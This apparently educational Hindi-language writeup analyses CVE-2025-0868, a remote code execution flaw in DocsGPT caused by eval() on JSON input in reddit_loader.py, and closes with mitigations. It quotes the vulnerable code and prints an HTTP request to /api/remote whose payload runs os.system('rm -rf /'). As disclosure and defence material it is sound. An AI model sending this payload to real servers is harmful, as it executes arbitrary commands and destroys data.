
शैक्षिक पैठ परीक्षण रिपोर्ट जो CVE-2025-0868 के शोषण को प्रदर्शित करती है, जो DocsGPT में असुरक्षित eval() के उपयोग के कारण JSON पार्सिंग में एक गंभीर RCE भेद्यता है, साथ ही शमन रणनीतियाँ।
20 फरवरी 2025 को ओपन-सोर्स DocsGPT लाइब्रेरी में एक गंभीर रिमोट कोड निष्पादन (RCE) दोष (CVE-2025-0868) का खुलासा किया गया था, जो JSON पेलोड को पार्स करते समय eval() के असुरक्षित उपयोग के कारण हुआ।
मुख्य विवरण:
यह कमजोरी हमलावरों को /api/remote एंडपॉइंट के माध्यम से मनमाना पायथन कोड चलाने की अनुमति देती है। DocsGPT एक ओपन-सोर्स जनरेटिव-AI उपकरण है जो GPT मॉडल का उपयोग करके प्रोजेक्ट दस्तावेज़ीकरण को क्वेरी करने में सक्षम बनाता है।
वेक्टर: AV:N/AC:L/PR:N/UI:N/VC:H/VI:H/VA:H
आधार स्कोर: 9.3 (गंभीर)
शोषण क्षमता मीट्रिक:
प्रभाव मीट्रिक:
यह कमजोरी reddit_loader.py में मौजूद है जहां उपयोगकर्ता इनपुट को असुरक्षित eval() फ़ंक्शन का उपयोग करके संसाधित किया जाता है:
def load_data(self, inputs):
data = eval(inputs) # Vulnerable code
client_id = data.get("client_id")
client_secret = data.get("client_secret")
user_agent = data.get("user_agent")
यह एक हमलावर को JSON फ़ील्ड के अंदर दुर्भावनापूर्ण पायथन कोड निष्पादित करने की अनुमति देता है: POST /api/remote HTTP/1.1 Content-Type: application/json
{"data": "import('os').system('rm -rf /')"}
इस कमजोरी का शोषण करने के लिए, हमने कमजोर वातावरण और एक सुरक्षित कार्य स्थान को पुनः बनाया:
हमने एक Python स्क्रिप्ट विकसित की जो /api/remote एंडपॉइंट पर एक दुर्भावनापूर्ण पेलोड भेजकर रिमोट कोड निष्पादन (RCE) निष्पादित करती है, eval() के असुरक्षित उपयोग का शोषण करती है।
/api/remote एंडपॉइंट में RCE।/api/remote पर दुर्भावनापूर्ण JSON भेजें।POST /api/remote HTTP/1.1
Content-Type: application/json
{"data": "__import__('os').system('rm -rf /')"}
DocsGPT v0.12.1 और बाद के संस्करणों में अपडेट करें
eval() को json.loads() से बदलें।
Link:https://github.com/arc53/DocsGPT/blob/df9d432d29c1bbdf28abb3d35d129060b1964dd3/applicatio n/parser/remote/reddit_loader.py#L9
| श्रेणी | विवरण |
|---|
| CVE ID | CVE-2025-0868 |
| प्रभावित सॉफ्टवेयर | DocsGPT v0.8.1 – v0.12.0 |
| कमजोरी प्रकार | रिमोट कोड निष्पादन (RCE) |
| हमला वेक्टर | नेटवर्क-आधारित (/api/remote को HTTP अनुरोध) |
| मूल कारण | अविश्वसनीय JSON इनपुट पर eval() का असुरक्षित उपयोग |
| प्रभाव | पूर्ण सर्वर समझौता (मनमाना कमांड निष्पादन) |
| CWE मैपिंग | CWE-77: कमांड में प्रयुक्त विशेष तत्वों का अनुचित न्यूट्रलाइज़ेशन |